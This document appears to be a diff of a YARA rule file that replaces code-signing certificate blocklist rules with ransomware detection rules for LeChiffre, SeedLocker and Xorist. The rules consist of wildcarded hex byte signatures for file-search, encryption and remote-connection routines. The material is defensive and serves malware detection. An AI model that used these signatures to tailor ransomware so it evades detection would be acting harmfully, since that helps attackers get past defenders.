source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.LeChiffre.yara#L1-L123" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0b96f5f48700f2cba22da91187b3111946074e9cc58a502f25d7b96059a043cb" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "LeChiffre" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection_1 = { + 55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF + 30 64 89 20 8B 45 ?? 33 D2 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 + ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 + ?? 8B 08 FF 51 ?? 8B 45 ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B + D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 45 + ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 E8 ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? 59 E8 ?? + ?? ?? ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? + 8B 45 ?? E8 ?? ?? ?? ?? C3 + } + $remote_connection_2 = { + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 + C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? 8B 80 ?? ?? ?? ?? 66 BE ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 + ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 + } + $remote_connection_3 = { + E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ?? + ?? ?? DD 5D ?? 9B FF 75 ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? + ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? + 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF + 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D + ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B + 45 ?? E8 ?? ?? ?? ?? C3 + } + $encrypt_files_1 = { + E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? + 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 + ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? + 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? 83 7B ?? ?? 0F 84 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B + 03 E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 03 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 86 ?? ?? + ?? ?? B2 ?? 8B 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 03 E8 ?? ?? ?? ?? FF 75 ?? + 68 ?? ?? ?? ?? 8B 43 ?? C1 E8 ?? 33 D2 52 50 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? + ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 86 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 03 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? C3 + } + $encrypt_files_2 = { + E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? 8B 12 8B 92 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? E8 ?? ?? ?? ?? 3D ?? + ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? + ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 8B 40 + ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 + FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 + 8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 + C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? + ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 + 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + A1 ?? ?? ?? ?? 8B 00 8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 + ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 + ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3 + } + $find_files = { + E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? + 84 C0 0F 85 ?? ?? ?? ?? 33 C0 89 43 ?? 8B 43 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 7C ?? 46 + 33 FF 8B 43 ?? C7 04 B8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8B + F0 85 F6 7C ?? 46 33 FF 8B 43 ?? 8B 40 ?? 8B 14 B8 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 43 ?? 8B 53 ?? 89 14 B8 47 4E 75 + ?? 8B 73 ?? 4E 85 F6 7C ?? 46 33 FF 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 04 BF 8B 53 ?? + 8D 04 C2 89 43 ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? 8B 10 8B 45 ?? E8 ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B + 45 ?? 33 D2 E8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? + ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? BA ?? ?? ?? + ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? + ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 + E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? + ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Inter Med Pty. Ltd." and pe.signatures[i].serial=="39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" and 1583539200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $find_files and $encrypt_files_1 and $encrypt_files_2 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1362E56D34Dc7B501E17Fa1Ac3C3E3D9 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Seedlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects SeedLocker ransomware." author = "ReversingLabs" - id = "9dccd009-eca1-5f21-b5ef-1a75f9d93c7d" - date = "2023-11-08" - modified = "2023-11-08" + id = "efa3dd2e-faf4-5882-aef8-85189e65f0f9" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3580-L3596" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0415c5a49076bab23dfc29ef2d6168b93d6bfde07a89ccb0368d2c967422407a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.SeedLocker.yara#L1-L91" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a478efcfb03e3eeebe72d9a71629456cf061c3c779fbdde99539854caf8c7c33" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "SeedLocker" + tc_detection_factor = 5 importance = 25 + strings: + $search_files = { + 48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B + 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9 + BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? + 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24 + ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ?? + ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? + ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 + 5D C3 + } + $encrypt_files_p1 = { + FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8 48 8D 85 ?? ?? ?? + ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 45 33 FF 4C 8D 05 ?? ?? ?? ?? 66 44 89 + 38 45 33 C9 48 83 C0 ?? 4C 89 7C 24 ?? 48 89 05 ?? ?? ?? ?? 33 D2 48 8D 05 ?? ?? ?? + ?? 44 89 7C 24 ?? 33 C9 48 89 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 45 8D 47 ?? 33 + C9 FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? + ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44 8B F0 FF + 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 + FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46 ?? 48 63 C8 48 8D 1C 4B 66 44 + 39 3B 75 ?? 48 8B CE FF 15 ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 + 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 1D ?? ?? ?? ?? 48 81 + C3 ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B D3 48 8D 4C 24 ?? 44 8B F0 FF + 15 ?? ?? ?? ?? 85 C0 75 ?? 44 8B 44 24 ?? 8D 48 ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B F0 + 48 83 F8 ?? 74 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 41 8D + 46 ?? 48 63 C8 48 8D 1C 4B 66 44 39 3B 75 ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ?? + ?? 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 D2 48 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 35 ?? ?? ?? ?? 48 + } + $encrypt_files_p2 = { + 8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? + ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 89 BD + ?? ?? ?? ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF + 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 48 8D 44 24 ?? 45 + 33 C9 45 33 C0 48 89 44 24 ?? 8D 53 ?? 33 C9 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? + 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? + ?? 3D ?? ?? ?? ?? 75 ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? + ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D + ?? ?? ?? ?? 41 8B DF 48 81 C1 ?? ?? ?? ?? 45 8B F7 FF 15 ?? ?? ?? ?? 85 C0 7E ?? 49 + 8B F7 48 8B 05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F BE 8C 06 ?? ?? ?? + ?? 44 0F BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 + 48 8D 8D ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 48 8D 76 ?? FF C3 41 83 C6 ?? + 88 84 0D ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44 + } + $encrypt_files_p3 = { + 3B F0 7C ?? 48 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 48 8D + 95 ?? ?? ?? ?? 44 8B C3 44 89 7C 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? + ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ?? + ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ?? + 48 89 44 24 ?? 33 D2 48 8D 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41 + ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 8B DF 44 39 BD ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05 + ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 8C 05 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ?? + ?? ?? 72 ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ?? + 48 8B 05 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 83 C0 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? + ?? ?? 48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 06 00 48 + 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 66 44 89 BD ?? ?? 00 00 F3 0F 7F 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 48 8B 8D ?? ?? ?? ?? + 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? + 49 8B E3 41 5F 41 5E 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO \"Amaranth\"" and pe.signatures[i].serial=="13:62:e5:6d:34:dc:7b:50:1e:17:fa:1a:c3:c3:e3:d9" and 1575936000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $search_files and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4B83593Fc78D92Cfaa9Bdf3F97383964 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Xorist : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Xorist ransomware." author = "ReversingLabs" - id = "8b5a8a8e-16f5-5098-83e5-72820f4f548a" - date = "2023-11-08" - modified = "2023-11-08" + id = "804ae039-fc3b-5f19-860e-df9efe87ee4d" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3598-L3614" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "775e41fc102cbaeb9374984380b0e073de2a0075b9a200f8ab644bd1369ba015" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Xorist.yara#L1-L150" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c428838cdd103f62508a23c9333b08567625291e110aa437324ecf37c62dca36" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Xorist" + tc_detection_factor = 5 importance = 25 + strings: + $search_and_encrypt_v1_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F + 84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C ?? 75 ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 + } + $search_and_encrypt_v1_p2 = { + 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? + E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 